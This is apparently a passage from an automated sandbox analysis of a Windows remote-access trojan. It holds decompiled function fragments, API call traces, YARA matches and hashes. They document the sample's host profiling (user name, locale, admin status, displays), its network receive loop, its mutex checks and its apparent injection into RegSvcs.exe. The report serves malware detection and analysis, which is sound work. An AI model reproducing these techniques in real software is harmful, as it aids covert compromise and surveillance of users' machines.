                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B99FC
                                            • GetProcAddress.KERNEL32(00000000), ref: 013B99FF
                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B9A10
                                            • GetProcAddress.KERNEL32(00000000), ref: 013B9A13
                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B9A21
                                            • GetProcAddress.KERNEL32(00000000), ref: 013B9A24
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$HandleModule$LibraryLoad
                                            • String ID: 0:xt$EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                            • API String ID: 551388010-1336425610
                                            • Opcode ID: b5133cf5bc86bacacb16a7c2072d393c4497ddfb191801bf864ac5d2cff702de
                                            • Instruction ID: aabf8552a8fa9cacc6747d09c539fcdc85b571064fbfa86614828e1316c2e9cd
                                            • Opcode Fuzzy Hash: b5133cf5bc86bacacb16a7c2072d393c4497ddfb191801bf864ac5d2cff702de
                                            • Instruction Fuzzy Hash: 212168F0E81359BEDA306BB75C4FD1A7E5CDAA4FA9B11441EE104A730DDEB9A8008F54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B2149, Relevance: 16.6, APIs: 11, Instructions: 75networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,013CBE70,013CB310,?,?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6), ref: 013B215B
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,013CBE70,013CB310,?,?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6), ref: 013B2168
                                            • malloc.MSVCRT ref: 013B2175
                                            • recv.WS2_32(013CBE70,00000000,000003E8,00000000), ref: 013B2186
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,013CBE70,013CB310,?,?,?,?,?,?,?,?,?,?,013BD1C8), ref: 013B219A
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6,00000001), ref: 013B21A4
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6,00000001), ref: 013B21AD
                                            • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6,00000001), ref: 013B21BA
                                              • Part of subcall function 013B221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,013CBE70,00000000), ref: 013B2230
                                              • Part of subcall function 013B221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(013CB300,013C5664), ref: 013B2248
                                              • Part of subcall function 013B221E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B2257
                                              • Part of subcall function 013B221E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B2261
                                              • Part of subcall function 013B221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 013B227A
                                              • Part of subcall function 013B221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B2283
                                              • Part of subcall function 013B221E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(013BD2A6,013CBEA4), ref: 013B22A2
                                              • Part of subcall function 013B221E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B22C2
                                              • Part of subcall function 013B221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(013CB300,013C5664), ref: 013B22DA
                                              • Part of subcall function 013B221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(013BD2A6), ref: 013B22EC
                                              • Part of subcall function 013B221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6F525DF0), ref: 013B2302
                                              • Part of subcall function 013B221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B230C
                                              • Part of subcall function 013B221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B2315
                                              • Part of subcall function 013B221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,013BD2A6), ref: 013B2326
                                              • Part of subcall function 013B221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B2330
                                              • Part of subcall function 013B221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B2339
                                              • Part of subcall function 013B221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B234D
                                            • free.MSVCRT(00000000,013CBE70,013CB310,?,?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6,00000001), ref: 013B21DB
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6,00000001), ref: 013B2204
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6,00000001), ref: 013B220D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                            • String ID:
                                            • API String ID: 2200674315-0
                                            • Opcode ID: 1fc28a57673dfa0ea4fcc640859f2a1652df5b1ba1fa34f620ee33134f17cb5a
                                            • Instruction ID: e4fe25f6a8754fa1ea7abda5d8978e1ce10776fc232e512eea327e2c1dbcf9ac
                                            • Opcode Fuzzy Hash: 1fc28a57673dfa0ea4fcc640859f2a1652df5b1ba1fa34f620ee33134f17cb5a
                                            • Instruction Fuzzy Hash: BE21373260050A9FCB15DB64D998FDF7BBDFF5470AF100119E902A2450DB71BA05CB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C2163, Relevance: 9.0, APIs: 6, Instructions: 41COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 28%
                                            			E013C2163(intOrPtr _a4) {
				char _v5;
				char _v12;
				long _v16;
				char _v32;
				void* _v48;
				char _v80;
				short _v592;
				char* _t23;
				char* _t25;

				_v12 = 0x10;
				 *0x13cc1e8(1,  &_v80,  &_v12); // executed
				_v16 = 0x100;
				GetUserNameW( &_v592,  &_v16); // executed
				_t23 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
				_t25 =  &_v32;
				L013C416A();
				L013C4146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}












                                            0x013c216f
                                            0x013c217d
                                            0x013c2186
                                            0x013c2195
                                            0x013c21a5
                                            0x013c21ae
                                            0x013c21b9
                                            0x013c21bd
                                            0x013c21c9
                                            0x013c21d4
                                            0x013c21dd
                                            0x013c21e7

                                            APIs
                                            • GetUserNameW.ADVAPI32(?,?), ref: 013C2195
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(013C6C08,?,?), ref: 013C21AE
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 013C21BD
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 013C21C9
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C21D4
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C21DD
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                            • String ID:
                                            • API String ID: 3382107156-0
                                            • Opcode ID: c3e6d5652a91ca552a92f3fa7a1f7639c60500766be014e360e16df6feae5209
                                            • Instruction ID: 8eeb5459f4d4868a39bc75f3c705809816b599bf79d2cb3856b3e90c175934e5
                                            • Opcode Fuzzy Hash: c3e6d5652a91ca552a92f3fa7a1f7639c60500766be014e360e16df6feae5209
                                            • Instruction Fuzzy Hash: 1701DEB2D0010EAFDF11DF94E849EDE7B7CEB54304F008155F516E2140EB75B6498BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B9E7D, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E013B9E7D(void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v8;

				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3); // executed
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8,  &_v5, __ecx);
				return _a4;
			}





                                            0x013b9e8e
                                            0x013b9e9f
                                            0x013b9ea9

                                            APIs
                                            • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,013CBFB8,?,013BCCE4,?,013CB310,013CBCD8,013CB310,00000000,013CB310,00000000,013CB310,2.7.2 Pro), ref: 013B9E8E
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,013BCCE4,?,013CB310,013CBCD8,013CB310,00000000,013CB310,00000000,013CB310,2.7.2 Pro,013CB310,00000000,013CB310), ref: 013B9E9F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@InfoLocaleU?$char_traits@
                                            • String ID:
                                            • API String ID: 4090406865-0
                                            • Opcode ID: c29e367ff2c6257ca187e3065411e85401c6c685dc6cc73a5ccea51c1743d2f5
                                            • Instruction ID: 8b7cf27853ed1a070c888aca92471261cb2ee8d428ed610a7e9096f70903deb0
                                            • Opcode Fuzzy Hash: c29e367ff2c6257ca187e3065411e85401c6c685dc6cc73a5ccea51c1743d2f5
                                            • Instruction Fuzzy Hash: CBE0E27560020DFBDB10CB90E845ECA77ACAB08749F000051BA02E6180DAB0BB088BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B8C98, Relevance: 265.2, APIs: 134, Strings: 17, Instructions: 938synchronizationthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 013B9823: malloc.MSVCRT ref: 013B9846
                                              • Part of subcall function 013B9823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 013B9872
                                              • Part of subcall function 013B9823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B987E
                                              • Part of subcall function 013B9823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B9887
                                              • Part of subcall function 013B9823: malloc.MSVCRT ref: 013B9898
                                              • Part of subcall function 013B9823: free.MSVCRT(?,?,?,00000000,013B8CAD,00000000), ref: 013B98E3
                                              • Part of subcall function 013B9823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B98F1
                                              • Part of subcall function 013B9823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B98FA
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(013CBC80,?,?,00000000), ref: 013B8CB7
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B8CC6
                                              • Part of subcall function 013C29EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C29FA
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A11
                                              • Part of subcall function 013C29EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5), ref: 013C2A27
                                              • Part of subcall function 013C29EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 013C2A45
                                              • Part of subcall function 013C29EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A4F
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A58
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A6D
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A7A
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ACC
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2AD5
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ADE
                                            • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 013B8D31
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 013B8D42
                                            • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 013B8D50
                                            • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 013B8D5E
                                            • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 013B8D6A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B8D73
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 013B8D8C
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(013C40D8,Software\,00000000,0000000E,013C5774), ref: 013B8DB4
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,013C5774), ref: 013B8DC1
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,013C5774), ref: 013B8DD1
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,013C5774), ref: 013B8DDA
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,013C5774), ref: 013B8DE3
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,013C5774), ref: 013B8DF5
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,013C5774), ref: 013B8E11
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(013C6524,013C40D8,?,?,?,?,0000000E,013C5774), ref: 013B8E37
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(013C6524,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B8E56
                                            • OpenMutexA.KERNEL32 ref: 013B8E80
                                            • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,013C5774), ref: 013B8E93
                                            • CloseHandle.KERNEL32(013C40D8,?,?,?,?,0000000E,013C5774), ref: 013B8E9C
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,013C5774), ref: 013B8EAD
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B8ECC
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B8EEF
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B8EFA
                                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B8F04
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B8F0A
                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000104,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B8F2F
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B8F61
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B8F6A
                                            • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B8F89
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B8FAF
                                            • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(013C5F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 013B8FD4
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B8FF2
                                              • Part of subcall function 013BB47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,013B7A4E,80000001,00000000), ref: 013BB495
                                              • Part of subcall function 013BB47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,013CBA38,?,013B7A4E,80000001,00000000), ref: 013BB4AA
                                              • Part of subcall function 013BB47F: RegCloseKey.ADVAPI32(00000000,?,013B7A4E,80000001,00000000), ref: 013BB4B5
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B901A
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 013B9044
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B904D
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B905E
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B9079
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B9094
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B90AF
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B90D4
                                            • wcslen.MSVCRT ref: 013B90DB
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B90E7
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B9108
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B911A
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B9135
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B913E
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B9147
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013B9172
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 013B9189
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 013B91AC
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 013B91CA
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 013B91DC
                                              • Part of subcall function 013B7E37: wcslen.MSVCRT ref: 013B7E46
                                              • Part of subcall function 013B7E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 013B7E5D
                                              • Part of subcall function 013B7E37: CreateDirectoryW.KERNEL32(00000000), ref: 013B7E64
                                              • Part of subcall function 013B7E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,013CBC68,013C5A24,?), ref: 013B7E77
                                              • Part of subcall function 013B7E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 013B7E84
                                              • Part of subcall function 013B7E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 013B7E94
                                              • Part of subcall function 013B7E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 013B7E9D
                                              • Part of subcall function 013B7E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 013B7ECB
                                              • Part of subcall function 013B7E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 013B7ED3
                                              • Part of subcall function 013B7E37: wcscmp.MSVCRT ref: 013B7EE0
                                              • Part of subcall function 013B7E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 013B7EF1
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B91F0
